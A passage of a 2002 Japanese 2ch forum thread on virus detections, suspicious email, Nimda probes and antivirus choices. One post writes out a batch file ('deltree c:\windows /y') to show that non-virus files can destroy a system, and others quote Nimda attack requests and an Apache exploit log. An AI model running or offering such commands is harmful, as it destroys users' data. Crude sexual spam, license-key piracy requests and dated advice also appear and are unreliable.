AVGで検出したんだけど誤検出だったらごめん。

344 :名無しさん@お腹いっぱい。:02/04/14 19:34
>>341
ウィルスじゃないからと言って実行したのなら更に言語道断。
ウィルスチェッカーは、当たり前だがウィルスしかチェックしない。この
世にはウィルス以外に PC を破壊するトリガーが存在しないと思ってか?

例えば、

 echo off
 deltree c:\windows /y

とだけ書いたファイルを a.bat という名前で作っても、これはウィルスで
はないので Vshield では引っかからない。だからといって実行するか?

345 :cheshire-cat:02/04/14 19:41
今手元のパソコンが出払っているんだけど。
電話番号サーチをウイルススキャンしたら、
Norton:Backdoor.SubSeven
Antidote簡易版:Backdoor.SubSeven.22.a

346 :名無しさん@お腹いっぱい。:02/04/14 19:49
W32.Klez.E@mm
が検出されましたが、ノートンで未検出?とかになってます
検出のとこに入れようとしたけど破損してるかなんかでよくわかりませんでした。
その後に、「このPCは正常に動作します」ってのが出たんだけど
もう大丈夫ってことなんでしょうか?

このウィルスについて調べてみたらノートンとかのチェッカーソフトを無効にする
とか出てたので・・
UPDATAは昨日済ませたばかりです。
6日に発動らしいので6日までに全部ファイル出しちゃった方がいいのかな・・
初めてのウィルスで不安になってます。

あと、転送先でウィルスっぽいと思ったのでポスペで開いたんですが
これで添付ファイルを消したらもう安心ですか?
ポスペってHTML形式じゃないから・・

347 :cheshire-cat:02/04/14 20:07
>>346
ほれ。
感染マシンのOSが「Windows9x/ME」の場合はこちら
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3288
感染マシンのOSが「WindowsNT/2000」の場合はこちら
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=3291

んじゃ、利家とまつを見てくる。

348 :名無しさん@お腹いっぱい。:02/04/14 21:10
Klez系の質問はこちらでやってください


Klez系,Klez.Eスレッド
http://pc.2ch.net/test/read.cgi/sec/1018248786/l50

349 :321:02/04/14 21:37
>>342
できました!
今直った方から書き込んでいます!
ご鞭撻ありがとうございます。
>>343
親切にありがとうございます!
リンク先読ませて頂きました。
こういう方法でも直るんですね。
勉強になりました。感謝です♪
>>344
仰せの通りだと思います。
危機管理ができてなかった自分が情けないです。
1日Netができなくなっただけですんで、本当に良い薬になりました。
344さんの言葉を忘れないように以後肝に銘じます。
>>345
SubSevenでしたか。
わざわざ調べて頂き、本当にありがとうございました。
信頼できるウィルス感知ソフトを探すことにします。
一つのチェッカーに頼るのは危険だと言う事も学ばせて頂きました。

ご助力下さった皆様、本当に感謝してます。
Netに繋げるという喜びを今しっかり噛み締めています。

350 :cheshire-cat:02/04/14 21:55
>>349
良かったね。
んでも漏れ、343の人と同じく、Sub7の通常の?挙動と違うような気がした。
治ったならいいんだけど。

とりあえず再起動直後にネットに接続しない状態で、DOS窓(スタート→プログラム→アクセサリ→コマンドプロンプト)に、「netstat (半角スペース)-an」って入力して、Local Addressの行のポートを全て書いてくれ。
9X系ならDos窓は、スタート→プログラム→MS-DOSプロンプトだな。

351 :cheshire-cat:02/04/14 21:57
ポートってさ、「0.0.0.0:1025」とかの1025の部分。

352 :cheshire-cat:02/04/14 22:58
>>349
お〜〜〜い、寝ちゃった?

353 :名無しさん@お腹いっぱい。:02/04/15 01:46
メールでexeファイルのついているものがあったのですが、これってウイルスでしょうか?
検索かけたんですが、出てこないし、ウイルス情報サイトにも情報がなかったため…。
メールのタイトルが
including full path
で添付ファイルがついていたんです。
ファイル名がSTARS.exeです。
本文が英文なので何かの勧誘かと思ったんですが…。
内容に"Wild Cards"とあったんですが何かのウイルスでしょうか?詳細キボンヌ
よろしくおながいします。

354 :名無しさん@お腹いっぱい。:02/04/15 01:55
>>353
STARS.exeでgoogle検索してみるとわかるけどウィルスらしい。

355 :353:02/04/15 02:02
>>354
回答どうもありがとうございます。
添付ファイル名では検索してませんでした…厨ですみません。
安心して眠れます。おやすみなさい。

356 :名無しさん@お腹いっぱい。:02/04/15 17:50
coderedに感染していると思われるサーバから
(/scrips/root.exe以下略)というアクセスがかなりあったので
そこに連絡したら成りすましですね。と言われた。
本当なのか調べたいんですがどうしたらいいのでしょうか?

357 :356の意味がわからん。:02/04/15 17:53
 

358 :名無しさん@お腹いっぱい。:02/04/15 18:01
>>356
隣の晩御飯

359 :356:02/04/15 18:04
ごめんnimdaでした。

なりすましですよ。
/scripts/root.exe?/c+dir HTTP/1.0" 200 287
こんなアクセスがとあるサーバから来てたんですよ。
で、そこの管理者をwhoisで調べて連絡したら
ウチからはでてねーぞって言われたんです。
ウチのIPに成りすましてるしらん奴からのアクセスじゃねーの?って
nimdaってなりすましとかできんのかなーって思ったんです。

360 :名無しさん@お腹いっぱい。:02/04/15 19:19
Information Japan
A powful tool
Returned mail--"bgcolor"
A very new game
ParseFloat(navigator.appVersion)
っていうメールがここ3日できました。
ウイスルですね...。

361 :名無しさん@お腹いっぱい。:02/04/15 19:27
whistle?

362 :cheshire-cat:02/04/15 20:04
>>359
漏れ以前、NimdaだかCodeRedUのIPアドレス調べて相手に連絡した。
そしたら「これってUNIXなんですが。因縁ですか!」、って回答。
結局そのUNIXがNATか何かしていて、その下のパソが感染してた。

そゆパターンじゃないのかな。
じゃなければ、相手が大嘘ついているのかも。

漏れも、Nimda感染PCを装って相手を攻撃するようなツール探しているけど、まだ見つからないんで。

363 :名無しさん@お腹いっぱい。:02/04/15 20:23
>>359
そのIPのHTTPにアクセスしてみる。何らかのページが出たら
そのソースを見て、一番最後に
<html><script language="JavaScript">window.open("readme.eml", null (略
が無いか確認。

364 :cheshire-cat:02/04/15 20:33
>>363
ところが。
漏れが書いたケースだと、繋がらなかったりするのよ。

365 :ログを公開せよ!!!!!:02/04/15 21:51
>>359
自分のアドレスを隠して張ってくれ!!!!!

366 :359:02/04/15 23:14
ログはちょっちまずそうなのでやめときます。

実は362さんが言うとおりだと思うんですよね。
NATとかやってると思うんですよ。
その下のPCからアクセスだったらわからないですしね。
ちなみにNimdaからのアクセスがあったときに即nmap打ってみたんですが
なんもあいてませんでした。PINGすら返事ありませんでした。

port 80,139とかあいてれば大体Nimda感染してるのわかるんですが
証拠を手に入れたわけじゃないんで
相手からなりすましじゃねーの?言われて言い返せませんでした。
Nimdaっぽいログでなりすまし情報の事例って聞かないんだけどなぁ。

367 :cheshire-cat:02/04/15 23:22
>>366
Nimda系なりすまし系ツール、捜し求めているんだけど、漏れは見つけられない。
もしルーティングテーブル書き換えてわざわざやってるヤシがいるんなら話は別だが。
大抵はNATとかそゆうのかと思う。
もしくは嘘。信用問題だからね、今時感染って。

368 :名無しさん@お腹いっぱい。:02/04/15 23:43
質問です。
HDDの空き容量が減っていく、というウィルスってないでしょうか?
HDDのアクセスランプ変な時に点滅し
空き容量が減りました。(2G→700M)

ちなみに総容量はかわっていません。

369 :cheshire-cat:02/04/15 23:45
>>368
あるよ、サーカムとか。
というかファイル名書かないと誰も答えられないよ。

370 :368:02/04/15 23:50
>>369
ありがとうございます。
情報を集めてきます。

371 :359:02/04/15 23:59
>>chesire-cat氏
いろいろありがとう。自分も探してるんですが見つかりません。
その前にNimdaっぽいアクセスをわざわざなりすましてまで
打ちたいともおもわないし。そんなツールは、やはりないのかも。
もうちょっと私も探してますが見つかったら教えてくださいね。

372 :cheshire-cat:02/04/16 00:10
>>371
簡単に作れそうな気もするけど、どこにもそんなのは公開されて無いんだよね。

漏れ、去年からずっと探しているんだけ。
スクリプトキッズとかじゃないんだけど、興味があって。
ハングルとか中国語で見落としているのかもしれないけど。

373 :名無しさん@お腹いっぱい。:02/04/16 00:36
下記のようなメールが2通送られてきたんですが、これって何でしょうか?
ちなみにウィルス検出ソフトはインストールしていません。

(1)
From: azzu10 <azzu10@yahoo.co.jp>
To: xxx@xxx.ne.jp
Subject: A special funny website

Content-Type: text/html;

Hi,This is a very funny website
I wish you would like it.

(2)
Date: Mon, 15 Apr 2002 23:59:30 +0900 (JST)
From: Super-User <root@nu.vpo.fenics.or.jp>
To: xxx@xxx.ne.jp
Subject: Virus Alert

*********************************
WARNING!
InterScan has detected a virus.
*********************************

Date :04/15/2002 23:59:28
FileName :ATT00012.pif
From :3402010@jln.or.jp
To :xxx@xxx.ne.jp
VirusName:WORM_KLEZ.E
Action :deleted

*********************************

374 :名無しさん@お腹いっぱい。:02/04/16 00:44
>>373
ウィルス対策ソフトを買ってください。
それは我々の負担を軽減することができます。

と言う意味

375 :インターネット=ソープランドのマンコ:02/04/16 01:13
373はナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=373のチンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?


376 :321:02/04/16 01:20
>>350-352 cheshire-catさん
亀レス申し訳ないです。
再起動直後にnetstat -an を実行してみた所、
137 と 138のポート番号が出てきました。

まだ、怪しい状態なんでしょうか・・

377 :名無しさん@お腹いっぱい。:02/04/16 01:27
>>376
LAN組んでないなら、今すぐNetbios over Tcp/ipを無効にしてください。

378 :名無しさん@お腹いっぱい。:02/04/16 01:38
>>377
組んでるので、何も触わらなくていいんでしょうか?

379 :321:02/04/16 01:39
↑の378は321です。

380 :名無しさん@お腹いっぱい。:02/04/16 01:52
137、138から外に出てかないようにしてください。
ローカル以外は駄目と設定しちゃう。

ウィルスとは関係ないだろうけどね。

381 :321:02/04/16 02:00
>>380
はい。分かりました。
今から、模索してやってみます。
非常に勉強になります。ありがとうございました!

382 :名無しさん@お腹いっぱい。:02/04/16 02:10
Message-Id: <xxxxxxx@newford.it.uu.net>
From: xxxxxx <xxxxxxx@mizar.freemail.ne.jp>
となってたら上のメアドから来たのが下のメアドを偽装したと
思えばいいんでしょうか?

383 :名無しさん@お腹いっぱい。:02/04/16 02:31
件名が『Eager to see you』というメールが届きました。
ウィルスだとは思いますが、どんなウィルスかわかりますか?

384 :名無しさん@お腹いっぱい。:02/04/16 02:44
>>383
グーグルで検索すれば直に分かると思う。というか分かった。

http://www.sophos.co.jp/virusinfo/analyses/w32kleze.html

385 :名無しさん@お腹いっぱい。:02/04/16 02:58
下のURLを踏んだら、ウイルスに感染したという画面がでました。しかし、拡張子が
gifなので、いたずらのアニメのような気がします。今のところPCの調子は悪く
なってないようですが、心配です。ヤヴァイでしょうか?
http://ime.nu/ime.nu/ime.nu/www.42ch.net/PictureGeneral/img-box/img20020324142939.gif

386 :名無しさん@お腹いっぱい。:02/04/16 03:11
ウィルスバスターは焼いてもらっても使えないって本当ですか?
聞いたところによるとシリアルナンバーとライセンスキーが必要だとか。
両方誰かからもらったとしても無理ですか?

387 :名無しさん@お腹いっぱい。:02/04/16 03:13
>>385
幸い、ただのgif

>>386
そんな質問をするくらいなら買ってきなさい

388 :名無しさん@お腹いっぱい。:02/04/16 03:25
>>386
ノートンなら焼いてもらっても大丈夫。
トレンド社はせこいので使わないほうがいいよ。


389 :名無しさん@お腹いっぱい。:02/04/16 03:40
>>385 >>387
何日かして急にハードディスクをクラッシュさせるタイプのものです。
踏んでしまったらアウトですね。
今のうちに急いでバックアップをとってOS再インストールされることをお勧めします。
南無

390 :名無しさん@お腹いっぱい。:02/04/16 04:12
>ウィルスバスターは焼いてもらっても使えないって本当ですか?
>聞いたところによるとシリアルナンバーとライセンスキーが必要だとか。
>両方誰かからもらったとしても無理ですか?

ノートンにしろ。


391 :名無しさん@お腹いっぱい。:02/04/16 05:26
ライセンスキー、上手にやれば問題ないらしいけどな。
じゃなければヤフオクで登録可能状態で売りに出したりもしないよな。

392 :391:02/04/16 05:27
あっ、385は踏むなよ。
俺はしらねぇぞ。
俺は踏むなって言ったからな。

393 :名無しさん@お腹いっぱい。:02/04/16 06:39
>>385
>>389
>>392
うそーーん!!踏んじゃったよ!!どうしよう…
ノートンの最新定義では反応しなかったのに(泣
CD-Rドライブが故障してるからOS再インストだけは避けたいんだけど…
何かいい回避方法はありませんか?
誰か教えてください!!

394 :386:02/04/16 09:51
だれかライセ○スキー、教えて!

395 :名無しさん@お腹いっぱい。:02/04/16 10:01
>>394 板違い、かつ違法。2度とここへ来るな。

396 :名無しさん@お腹いっぱい。:02/04/16 10:04
http://www.ne.jp/asahi/data/japan/

397 :アルゼンチンからDesosワームが発生:02/04/16 13:55
「詳しい譲歩具亜分かっていない」そうです(w
ttps://www.netsecurity.ne.jp/article/2/4793.html

398 :比較:02/04/16 14:24
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊

399 :名無しさん@お腹いっぱい。:02/04/16 18:58
>>394
おしえても意味ないんだってば

400 :名無しさん@お腹いっぱい。:02/04/16 20:45
教えてください、お願いします。

ウィルス名:PE_PADNIA
って言うのが4つウィルスバスターで見つかりました。
Cドライブにあることも解ってるのですが、駆除の仕方が
全く解りません…
ウィルスバスターは2001を入れていますが「隔離に失敗しました」
と出てしまいます。どうすればいいですか?

401 :名無しさん@お腹いっぱい。:02/04/16 21:09
http://www2.strangeworld.org/uedakana/sahra6147.jpg
↑このウイルスやばいんでしょうか?



402 :名無しさん@お腹いっぱい。:02/04/16 21:20
>>401
ウィルスと言うよりブラクラの類かな?
開いたら勝手にメール送信画面が大量に出てきた・・・鬱

403 :名無しさん@お腹いっぱい。:02/04/16 21:23
別にほっといてもいいんですか?

404 :名無しさん@お腹いっぱい。:02/04/16 21:24
>>400
2002にしる。

405 :401:02/04/16 21:34
大丈夫なんですか?

406 :名無しさん@お腹いっぱい。:02/04/16 21:45
MXでDLしたファイルに拡張子がscrとbatのものが入ってて、
batの中身をエディターで見たらklez.Eに感染してしまったんですけどこれってどういう仕組みなのか教えていただけませんか?
ファイルは削除してしまったのでもう無いんですが、誰か教えてください。

407 :名無しさん@お腹いっぱい。:02/04/16 21:47
>>406
こっちで聞いてみた方がいいかも。
http://pc.2ch.net/test/read.cgi/sec/1018248786/


408 :名無しさん@お腹いっぱい。:02/04/16 21:47
>>406
いや

409 :401:02/04/16 21:55
教えてくださいよ

410 :400:02/04/16 21:55
>>404
そんなイヂワル言わないで教えてちょ

どうしたらいいのぉ?

411 :名無しさん@お腹いっぱい。:02/04/16 22:30
>>410
・なんだかよく分からない(リンク切れ)の画像を画面一杯に
・mailto:沢山(メーラーが山ほど開く)
・Yahoo!とかFBIとかホワイトハウス宛てに telnetとかhttpとかしようとする
・con/con/con (懐かしの concon バグ)

仕掛けは以上。ウィルスとかは無い。

412 :名無しさん@お腹いっぱい。:02/04/16 22:32
鬱になって氏ねば直るじょ

413 : :02/04/17 00:10
質問!今日の新聞に
アンチウイルスソフト入れなくても
PCのウイルスを弾くってのがあったらしいけど
それってどんなの???

414 :名無しさん@お腹いっぱい。:02/04/17 01:17
http://www.geocities.co.jp/HeartLand-Ayame/1836/home.html

ここのサイトでトロイが検出されるたしいのですが
自分のPCに感染しているかどうかわかりません・・・
見た後しばらくして、掲示板を見た人がトロイに感染したことを知って
あわててノートン入ました。

今のところウイルススキャンには何も引っかかっていなくて、KPFにも
ひっかかっていません(一応トロイで使われそうなポートは閉じています)
誰か教えて〜(安全かどうか・・・

415 :名無しさん@お腹いっぱい。:02/04/17 01:43
>>414
サイトそのものにはウィルスの兆候無し。
掲示板が 2ch に荒らされてる事考えると、多分、
・誰かが投稿でスクリプトでも貼った
・閉鎖されているページにあった
のどちらかじゃないかと思うが、何しろ発見できなかったんで分からん。

416 :まんこ:02/04/17 03:02
くちゃい

417 :名無しさん@お腹いっぱい。:02/04/17 09:40
【最小化】【元のサイズに戻す】【閉じる】などの▲(←横だけど)が文字化けしています。
他にもチェックマークの欄などにも異常がおきています。
これってウイルスでしょうか?
使いにくいので誰か助けてください・・・・・お願いします。


418 :名無しさん@お腹いっぱい。:02/04/17 09:49
>>417 質問するときはOSなど環境書けよ。
http://homepage2.nifty.com/winfaq/fontstrouble.html

419 :417:02/04/17 10:32
win98SEです。
CPU=セレロン466、64MB のショボショボです。

>>418
どうもです。そのサイトとてもありがたいです。

420 :名無しさん@お腹いっぱい。:02/04/17 10:45
すいません。

今朝、JNB銀行に接続すると、なぜか、
DELLのアメリカに、何度やっても接続したのですが、
これは、ウイルスに感染が原因なのでしょうか?
それとも、トロイの木馬なのでしょうか?
レジストリを、盗まれているとか、言われたのですが、
何のことか良く分りません。


7時30分には、接続できました。
WIN MEで、 ウイルスバスター2002が、入っています。
全ドライブ検索では、何も出ませんでした。

何か、分かる方、お願いします。

421 :417:02/04/17 10:53
>>418
神!あなた神!!

治りました!

422 :名無しさん@お腹いっぱい。:02/04/17 16:03
ttp://www.watch.impress.co.jp/internet/www/article/2002/0417/mcaf.htm

これってどうなのでしょう?

423 :名無しさん@お腹いっぱい。:02/04/17 16:39
>>422 McAfeeはシステムに対する安定性で不評だからなあ。インストする
人(人柱)が増えて、調子良さそうなら検討してみてもよいかもね。

でも、どんな情報が共有されるのかはきちんと告知されないとスパイウェ
ア扱いを受けるかもね。

424 :Bird ◆j/Duetto :02/04/17 17:20
apacheにこんなログが大量に残ってました。
これってなんかのウイルスでしょうか?


207.33.111.34 - - [15/Apr/2002:16:21:26 +0900] "HEAD%00 /%20HTTP/1.0%0D%0
A%0D%0AAccept%3A%20tdtrgifrfs/../../index.html%3fcndxiwcwiqftq=/../uglratsfgm
cvisjskeukercjtpkirxqrirkzrfvrbrwunxuybjpsfyaqrtyawdazngeimbhazdubgipswfrxjg
(中略:同じような文字列が18行くらい続く)
orbeljokpwfomnoxtctikdenuuvplrbd/.././%42%42%2d%44%4e%42%44/./ HTTP/1.0" 501 1916

425 :名無しさん@お腹いっぱい。:02/04/17 19:39
>424
バッファオーバーフロー狙ってるのかなと。
サーバ関係はよく分からないので、スマソ。

426 :名無しさん@お腹いっぱい。:02/04/19 02:03
間抜けなことに共有フォルダをTCP/IPで開けっ放しにしてしまって、
気がついたらチャンコロがアクセス中・・・

すぐにぶった切って共有を閉じましたが、
ニムダのemlファイルを大量に残してくれました。

それでexeファイルを調べたら1つ書き換えられているのを発見したんです。
オリジナルと比べて4kくらい大きい。

とりあえずトレンドマイクロのオンラインスキャンとアンチドート・スーパーライトには
まったく反応せず。未知のウィルス?たぶんバックドアの類だと思いますが。

解析まではちょっとよーやらんので、
だれかこの謎のファイルをばらしてくれる人いませんか?


427 :2ch猛虎会 ◆NXKR8SIo :02/04/19 03:05
最近、実況板が心卑しい読売ファンに荒らされています。
明日から直接対決。マナーを守って、楽しく応援しましょう。
一人でも多くの阪神ファンのご参加とご協力をお願い申し上げます。

  ∧_∧     ∧_∧   ∧_∧   ∧_∧      ∧_∧
  ( ´∀`)    ( ´ー`)  ( `∀´)  ( ゚ ∀゚ )    ( ^∀^)
 (    つ┳━∪━━∪━∪━━∪━∪━━∪━┳⊂     つ
 | | |   ┃  が ん が れ ! た い が あ す!   ┃ | | |
 (__)_)   ┻━━━━━━━━━━━━━━━━┻ (__)_)

● スポーツ実況板 → http://live.2ch.net/dome/

428 :名無しさん@お腹いっぱい。:02/04/19 08:23
>>426
いません。

429 :名無しさん@お腹いっぱい。:02/04/19 13:00
先日MXでFlash MX6を落としたところ、中身はファイル名が文字化けした
意味不明なファイルが2つと、インストールファイルが入っており、
インストールしたら期限切れのトライアル版だったので、削除しました。
しかし、1つのファイルがゴミ箱までは行くものの、ゴミ箱から消えてくれません。
「ファイルが削除できません:ファイルが見つかりません。ファイルがすでに削除されているか。。」
と言うメッセージがでてきます。
やはり、これはウイルスなのでしょうか?
誰か知っておられる方いらっしゃいましたら教えてください。

あとスレ違いだったらスイマセン。



430 :名無しさん@お腹いっぱい。:02/04/19 13:12
プロ野球オールスター人気投票!マツリだワショーイ!
http://choco.2ch.net/test/read.cgi/news/1019188835/

431 :名無しさん@お腹いっぱい。:02/04/19 13:13
MXは自己責任。

432 :426はナマでパコパコ!!!!:02/04/19 14:13
ナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

433 :名無しさん@お腹いっぱい。:02/04/19 14:26
>>429

コマンドプロンプトでの削除が難しい場合、[スタート]−[ファイル名を指定して実行] で
winfile を起動し、ここから削除してください。(ファイルマネージャの操作方法は
エクスプローラとほとんど同じです。なお、Windows 2000/XP に winfile はありません。)

434 :名無しさん@お腹いっぱい。:02/04/19 14:32
>>429

ああ、それと、そのファイルはウイルスじゃないので安心してください。

435 :名無しさん@お腹いっぱい。:02/04/19 14:47
ノートンでウイルススキャンしたら「IFrame.Exploit」というものに
感染していていました。修復も出来なかったので全て削除したんです
けど、これってどんなウイルスなんでしょうか?ウイルス辞典とかに
もなかったんですが…。

436 :age:02/04/19 15:05
>>406
エディタは何を使ってますか?

秀とか、その他エディタは%SYSTEM%TEMPにテンポラリファイルを
作る傾向があります。
そのファイルが悪さをしてるようにみえます。

437 :名無しさん@お腹いっぱい。:02/04/19 15:05
>>435
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=10735 あんまし語ってないけど…
もしかして古いInternet Explorer使ってないか?
http://www.fs-support.yamada.co.jp/df/v-descs/v-descs2/iframe.htm

438 :名無しさん@お腹いっぱい。:02/04/19 15:16
2NDマシンでアプリのインストールをして、再起動したら
OS起動後(ログオン後)、HDDに激しくアクセス。デスクトップのアイコンが消えた
り、使用中のソフトにアクセスできないというエラーが出ました。
フォルダのみを残して全ファイルが削除されているし。
しらべたら「W32.Whiter.Trojan」でした・・・



439 :435:02/04/19 16:18
>>437
ありがとうございます。IEは6.0で
updateもしてるんですが…。

440 :cheshire-cat:02/04/19 21:54
>>439
IEのパッチ当ては関係無いんじゃ?
つまりゴミを仕込んだhtmlファイルを(パッチ導入済みで影響を受けなかったとしても)、アンチウイルスソフトの方でブロックしたから、そんな表示が出たってだけかと思うけど。

これってろくにパッチ当てしていない人のために、ワクチンベンダーが個別に対応したって事だと。
しかし何故Symantec情報で、「感染場所がcom」なんだ?
訳わからん。

441 :名無しさん@お腹いっぱい。:02/04/20 00:11
(コピペにレスするアホなのはわかってるが)

dome(スポーツ実況板)は
野球・サッカーは板違いであり
巨人も阪神も目糞・鼻糞なんだが


442 :名無しさん@お腹いっぱい。:02/04/20 00:11
>>441>>427

443 :435:02/04/20 00:21
>440
レスありがとうございます。ノートンでは

Unknown0124.data 圧縮ファイルの中C:\WINDOWS\TEMP\mep11E3.TMP
には IFrame.Exploit ウィルスが感染しています。
このファイルは検疫されました。

と出ました。感染はしてないけど、アンチウイルスソフトが
反応したってことでしょか?
なんにせ、よこまめにスキャンしてて良かったです…。

444 :名無しさん@お腹いっぱい。:02/04/20 01:32
どうやら、ひょんな事からウイルスをもらってしまったようなんですが
検出出来ないもので、さらに時限式だそうです。
いつかは分かりませんが、いずれHDD全消去という事になるそうです。
こうなってしまうと、バックアップとかする方法はないでしょうか?
ちなみに、ウイルスバスターでは検出されませんでした。


445 :名無しさん@お腹いっぱい。:02/04/20 01:56
>>444
>どうやら、ひょんな事からウイルスをもらってしまったようなんですが
この部分をもっと詳しく教えてくれないと答えようがない。

446 :444:02/04/20 02:30
見ず知らずの他人から「転送」してもらいました、といえば大体分かりますかね。

447 :名無しさん@お腹いっぱい。:02/04/20 03:08
俺も知らない奴からのメールにW32.Klez.E@MMが付いていて、それを削除
しようとしたらEdMaxのゴミ箱mbxがIFrame.Exploitに感染してるとNorton
が表示したのでビビッタ

448 :名無しさん@お腹いっぱい。:02/04/20 03:17
ttp://ime.nu/ime.nu/ime.nu/www.42ch.net/PictureGeneral/img-box/img20020324142939.gif

これってウイルス付きURLなんですか?


449 : :02/04/20 07:47
メールを送受信したら、何かを受信したのですが
「受信トレイ」には何も受信していませんでした。
しかし、「マイドキュメント」とかの表示を「Webページ」に
していたのいが、全て解除されていました。
何かに、感染してしまったのでしょうか?

450 :名無しさん@お腹いっぱい。:02/04/20 08:34
>>444
バックアップを取ろうにも、バックアップしたデータの中にウィルスが
まぎれ込むかもしれないので迂闊に動けない、という事を言っている?

451 :名無しさん@お腹いっぱい。:02/04/20 08:35
>>448
違う。


452 :名無しさん@お腹いっぱい。:02/04/20 08:42
>>449
OutlookExpressの事を言っているのだと思うが(ちゃんと書けよ)。
OEは使っていないので知らんが、症状を聞くかぎりウィルスではない。

453 :名無しさん@お腹いっぱい。:02/04/20 09:35
>>446 WinMXとはっきり書け。
「HDぜんぶ消去した上ズタズタに!!ウィルス 2台目」
http://pc.2ch.net/test/read.cgi/sec/1012296560/
↑なぜかsage進行になってる

454 :444:02/04/20 12:40
>>450
そのとうりで

455 :名無しさん@お腹いっぱい。:02/04/20 13:42
>>454
どんなデータを保存したいかによる。
残したいファイルの拡張子教えてくれれば判断できるのだが。

456 :名無しさん@お腹いっぱい。:02/04/20 15:02
>>455
どっちにせよ、MXだから、以下放置で。

>454
ダウソ板に逝け。

457 :名無し:02/04/20 15:05

なんか、私のPC(OSはWindows2000)から時々蛙の鳴き声がするよう
になったのですが、このようなウィルス、ワーム、いたずらソフトってあ
るのでしょうか?
このPCは私一人で使っています。
メールは使ってませんが、Flashは専用プレイヤーで見たりします。
最近は怪しいファイルをダウンロード、実行してません。
googleで検索してもそれらしい情報はありませんでした。




458 :名無しさん@お腹いっぱい:02/04/20 15:13
in98-NECです。
McAfee のプリインストール版4.03a
エンジンバージョン4.070を使用してたのですが
エラーが頻繁に出るため再セットアップしました。
でも直りません。不定期にこのエラーが出てきます。
例外ODがVXDVMM(01)+00005B01の0028:C0006B01で発生しました。
VXDVMM(01)+00008CDFの0028:C0009CDFからの呼び出しです
アンインストールしたのですが、他に何かできませんか?
スレ違いでしたらすみません。誘導お願いします。

459 :458:02/04/20 15:15
訂正-Win98です。

460 :名無しさん@お腹いっぱい。:02/04/20 15:24
>>458
アンインストールしたらエラーは出なくなった?それとも未だ出る?

461 :名無しさん@お腹いっぱい。:02/04/20 15:25
>>458
それはマカフィーから乗り換えなさいという神からのお告げです。
http://pc.2ch.net/test/read.cgi/software/1001838214/l50のスレを見ると分かりますが、
色々と不具合を起こすと言われているので。

ノートンかバスターに乗り換えましょう。

462 :名無しさん@お腹いっぱい。:02/04/20 15:26
>>457
先ず疑うのはサウンドの設定かな・・・
蛙の声は何かのイベント(マウスクリックとか)に連動してる?


463 :名無しさん@お腹いっぱい。:02/04/20 15:27
>>461
ココも。
http://ton.2ch.net/sec/kako/994/994010282.html

464 :458:02/04/20 15:32
>>460
レスありがとうございます。
アンインストールした直後も
何回かエラーが出てました。
今日はまだ出ていませんが‥
>>461
リンクありがとうございます!

465 :458:02/04/20 15:37
>>463
ありがとうございます!
今から行ってきます〜〜

466 :名無しさん@お腹いっぱい。:02/04/20 15:38
こんにちは。メールの件名が「Border」とかかれた添付ファイル付きのものは、
なんというウィルスでしょうか教えてください。

467 :名無しさん@お腹いっぱい。:02/04/20 15:39
>>464

何か、結構メジャーな問題なのか・・・
http://www.google.com/search?q=VXDVMM&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

ちなみに、vxdvmm っていうのは Mcafee のスキャンエンジンの名前?
Ctrl + Alt + Del でタスクマネージャー出すと表示されてる?

468 :名無しさん@お腹いっぱい。:02/04/20 15:40
>>466
添付ファイル名は?

469 :名無しさん@お腹いっぱい。:02/04/20 15:45
すみません。もう消してしまったので、情報がそれしかありません。
しかし、今日あて先不明のメールがかえってきましたが、
送った覚えはありませんでしたし、知らないアドレスでした。
それも件名が「Border」でした。

470 :457:02/04/20 16:18
----------------
>>462
特にイベントや時刻に連動してるようには見えません。
みなさんご存知ないようなので、ウィルス、ワームってことは
なさそうですね。

また気がついたことがあったら報告します。

471 :こんなん通るのか?・・・:02/04/20 16:25
http://www.zakzak.co.jp/top/top0419_3_14.html
PC使ったこと無い奴がきめてるのはこわいね。

472 :名無しさん@お腹いっぱい。:02/04/20 16:37
>>471
>さらに、コンピューターの記録を捜索したり、差し押さえができるように
>法体系を整備。電磁的記録棄損罪、電子計算機等使用業務妨害罪に
>準備罪を新設するほか、コンピューターウイルスなどの「不正プログラム」
>の製造、保有、譲渡などの行為を処罰対象とする。
おぃおぃ、漏れのウィルスコレクションも違法になるのかよ・・・

473 :名無しさん@お腹いっぱい。:02/04/20 16:41
>>471
俺みたいな厨房のために色々保存して検証してくれてる神々まで規制の対象になるのか…
はっきり行って規制した方がウィルスが蔓延するんじゃないかな…


